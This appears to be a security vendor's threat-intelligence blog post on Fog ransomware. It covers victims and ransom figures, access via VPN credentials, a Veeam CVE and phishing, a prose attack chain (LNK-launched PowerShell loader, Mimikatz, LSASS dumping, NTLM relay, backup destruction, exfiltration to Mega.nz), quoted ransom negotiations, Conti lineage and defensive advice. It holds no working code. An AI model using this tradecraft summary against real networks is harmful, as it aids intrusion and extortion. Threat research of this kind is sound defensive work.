A closer look at Fog ransomware

Fog ransomware emerged in April 2024 as a sophisticated cyberthreat that combined rapid encryption with double extortion tactics. Fog threat actors initially targeted educational institutions through compromised VPN accounts. They soon expanded their scope to government agencies and business sectors. As of February 2025, the top five sectors victimized by Fog are business services, technology, education, manufacturing, and government. Most of Fog’s victims are based in the United States.

Researchers suspect that Fog threat actors operate from Russia or other former Soviet nations, because they conspicuously avoid targeting the Eastern European countries and the People’s Republic of China. In a 2024 attack, researchers traced the origin of Fog-related IP address to Moscow.

Group or variant?

Analysts have been careful to distinguish Fog ransomware as a variant, rather than a threat group. There doesn’t appear to be any evidence of a centralized operation behind the use of Fog. It can be used by different threat actors to carry out attacks, and the developers are separate from those performing the intrusions.

Ransomware-as-a-Service (RaaS) affiliates also operate separately from ransomware developers, but there is always evidence of an organizational hierarchy or a separation of duties behind the software. There are rules and payment structures for the affiliates. We can’t consider Fog a RaaS operation because it doesn’t fit that description.

We also can’t rule out the possibility that Fog is or was intended to be used in a RaaS operation. Its modular design allows attackers to control what gets encrypted, the pace of the attack, the scope of encryption, and the content of the ransom note. It’s possible that it was developed with a RaaS operation in mind.

Although Fog doesn’t appear to be a single organization, it does fit the commonly understood parameters of a ‘threat actor group.’ Fog attackers share infrastructure and malware, they have common tactics, techniques, and procedures (TTPs), and they use similar phishing emails, ransom notes and negotiation chats across attacks. There is also a Fog branded leak site and negotiation portal, which means these threat actors are coordinating on how they communicate with the victims.

Fog actors have also been observed communicating during attacks using command-and-control (C2C) servers and encrypted communication channels.

Fog by the numbers

Based on available data, analysts have calculated the following metrics:

• Number of publicly reported victims: 189 as of April 2025
• Median initial ransom demand: $220,000
• Median ransom payment: $100,000  

The amount collected by Fog is unknown. If all publicly reported victims paid the median ransom payment, that would be $18.9 million. We know that not all victims pay the ransom, and not all incidents are reported. A recent survey found that 86% of organizations (globally) have paid ransom demands in the past year, which is interesting, but probably not applicable to victims of Fog.

There is no evidence that Fog threat actors are motivated by anything other than money. They have not declared any nation-state allegiance or shown support for an ideology or cause.

How Fog works

Fog usually spreads through one of the following initial access methods:

• Compromised SonicWall VPN accounts: These accounts are usually purchased through an initial access broker (IAB) but could be stolen directly through phishing campaigns.
• Vulnerability exploitation: The group actively targets unpatched software, particularly Veeam Backup & Replication (CVE-2024-40711)
• Phishing campaigns: Fog threat actors use phishing campaigns to deploy the ransomware loader. These emails usually pose as a VPN update request, an unpaid invoice inquiry, and a human resources (HR) policy change notification. The attachments act differently, but all result in attempts to download the Fog ransomware loader.

Recent phishing campaigns have used phishing emails with a ZIP file attachment that contains a malicious LNK shortcut. The LNK file executes a command that downloads a PowerShell script named "stage1.ps1" from an attacker-controlled domain. The script then downloads several payloads and supporting files. Ransom notes associated with these attacks have added insult to injury by mocking victims with references to Edward Coristine and the U.S. Department of Government Efficiency (DOGE). 

Researchers have determined there is no real affiliation between Fog ransomware and DOGE.

Once inside the system, Fog immediately begins system reconnaissance and attempts to establish persistence by modifying system configurations and deploying additional scripts that keep the malware active after a system reboot. The next step is to gain administrative control by using tools like Mimikatz and techniques like LSASS memory dumping and NTLM relay attacks. Fog will also establish anti-recovery measures, like encrypting backups and deleting volume shadow copies.

The attack proceeds with lateral movement and data exfiltration. Fog actors use the zero-knowledge cloud service Mega.nz to store stolen data prior to encrypting the network. This sets up the double extortion scheme. When this is complete, Fog will encrypt documents, databases, backups, and any other critical operational data. The extensions .fog, .Fog, or .FLOCKED are appended to the encrypted files, and ransom notes named "readme.txt" are distributed across the network. The victim's information is added to the Fog leak site. 

After the attack

Negotiations tactics follow the same those of other groups. 

If you want your data fully decrypted and the files we stole removed from our source, you will have to pay a fee. We will also be able to provide a security report and explain how we did it to get in. (source)

Fog starts with a high ransom demand and will compromise on a lower amount if it is acceptable. 

Upon payment, Fog will send decryption keys and confirm the deletion of the stolen data. In two of the chats available here, the victim had difficulties recovering and had to troubleshoot with the threat actor:

The security report promised by Fog probably isn’t useful for victims that are already following best practices. 

Access to your network was gained through a phishing mail. Your staff should be more vigilant when downloading and opening unfamiliar files. We recommend that you implement the following measures to protect your corporate network: 1) Enforce passwords on local and domain admins. Complicate group policy on passwords for all users; 2) Using the group "Protected users"; 3) Use centralised management of antivirus protection; 4) Inform users not to open suspicious emails and files; 5) Updating software and OS to current versions; 6) Set up permission delegations in the Active Directory; 7) Install an application to monitor activity in the Active Directory; 8) Use Vmware Esxi ver. 7.0 or more current. Our team guarantees that any data taken from your network will not be disclosed, sold or published. Of course, this dialogue will also remain confidential. (source)

The language is similar to the 'detailed security reports' provided by Akira.

Friends and family

Fog is barely a year old, but researchers suspect its operators are experienced ransomware threat actors. An analysis of Fog intrusions via compromised SonicWall VPN accounts shows that only 25% of the intrusions were linked directly to Fog. The remaining 75% of Fog intrusions were linked to Akira ransomware, suggesting collaboration and shared infrastructure. Fog and Akira also use similar tools and exploits and are known for their rapid encryption techniques.

Fog has also been linked to Conti ransomware through shared cryptocurrency wallets. Researchers linked Akira to Conti in 2023, so the link to Conti is not surprising, but it is noteworthy to investigators and researchers. Here's the high-level overview of the Conti family:

• Ryuk: August 2018 - early 2022. Evolved from Hermes and is the direct precursor to Conti.
• Conti: December 2019 - June 2022. Shut down and splintered into multiple groups.
• Karakurt: Emerged in June 2021 and active as of 2025. Spinoff of Conti.
• Quantum: Emerged in August 2021 and active as of 2025. Rebrand of MountLocker with ties to Conti.
• BlackByte: Emerged in Mid-2021 and active as of 2025. Conti affiliate.
• Zeon: January 2022 - September 2022. Direct precursor to Royal with ties to Conti.
• Royal: September 2022 - Mid/Late 2023. Rebrand of Zeon that evolved into BlackSuit.
• Black Basta: Emerged in April 2022 and active as of 2025. Spinoff of Conti.
• Akira: Emerged in March 2023 and active as of 2025. Closely linked to Conti.
• BlackSuit: Emerged in Mid-2023 and active as of 2025. Rebrand or evolution of Royal.
• Fog: Emerged in April 2024 and active as of 2025. Linked to Akira and Conti.

Conti was first observed in December 2019 and was fully offline by June 2022. Looking at Fog ransomware in this context underscores the fact that new does not mean inexperienced. Criminal expertise, code advancements and attack techniques move fluidly between these groups.  

Notable attacks

In June 2024, Darktrace observed multiple Fog ransomware attacks across customer environments, including one that took less than two hours from initial access to complete file encryption. This was the first attack to demonstrate Fog’s speed and sophistication. The attack methods included outgoing NTLM authentication attempts to another internal device, which was then used to establish a remote connection to a Windows server running Hyper-V. This attack was notable for speed and efficiency, and is one of the first indicators that multiple Fog actors collaborate in real-time. 

One of the most interesting attacks took place in August 2024, when Fog targeted a financial services company. Intruders logged in through a VPN account using stolen credentials. Security teams traced the IP of this intruder to Moscow, providing researchers with their first evidence of Fog’s Russian origins. The attack was also one of the first that targeted a sector other than education.  The attack was detected prior to encryption and was therefore unsuccessful.

Fog threat actors targeted the Brazilian Government Ministries in July 2023, resulting in the compromise of nine ministries, the nation’s mint, and its anti-money laundering agency. Attackers demanded $1.2 million, but there is no evidence that a ransom was paid. The incident is still under investigation.

This attack was claimed by Fog in the ransom note and the victim is listed on the Fog leak site, but it did take place nine months before Fog emerged as a threat. This is possible because the emergence of a threat commonly refers to when a threat is observed and publicly acknowledged. There can be a significant delay between the first attack and the first industry / researcher observation. After a threat emerges, researchers begin to connect the new threat with old attacks. This is referred to as ‘retrospective linking.’

Defend yourself

Defending against Fog and other ransomware threat actors starts with best practices and layered security. Start with strong authentication systems that include multifactor authentication (MFA) and zero trust access. Maintain a strong patch management system and close technical vulnerabilities like unused VPN accounts.

You can restrict the movement of intruders by segmenting networks and isolating sensitive data and backup systems. Zero trust access enables microsegmentation by isolating individual workloads and applying continuous verification across users and devices.

Consider adding advanced security to your network with Barracuda Managed XDR. This solution can identify and stop Fog’s malicious activities before encryption and data exfiltration. See our blog here for a minute-by-minute breakdown of our team stopped an attack by Akira ransomware.

Use a top-tier backup solution to protect your data, system states and device configurations, databases, virtual machines, Entra ID data, SharePoint and Microsoft 365 deployments, and anything else you can’t afford to lose. Barracuda offers multiple data protection solutions for on-premises, cloud and hybrid environments.  

And finally, maintain an up-to-date security awareness training program for employees. All network users should know how to recognize suspicious emails. Invest in a training program that can simulate attacks with samples of the most current phishing campaigns.

Barracuda can help

Barracuda security solutions are powered by AI and global threat intelligence. Our solutions fiercely defend all attack vectors with advanced threat protection and automated incident response that can be orchestrated across solutions. Visit our website to schedule a demo and see how it can help protect your environment.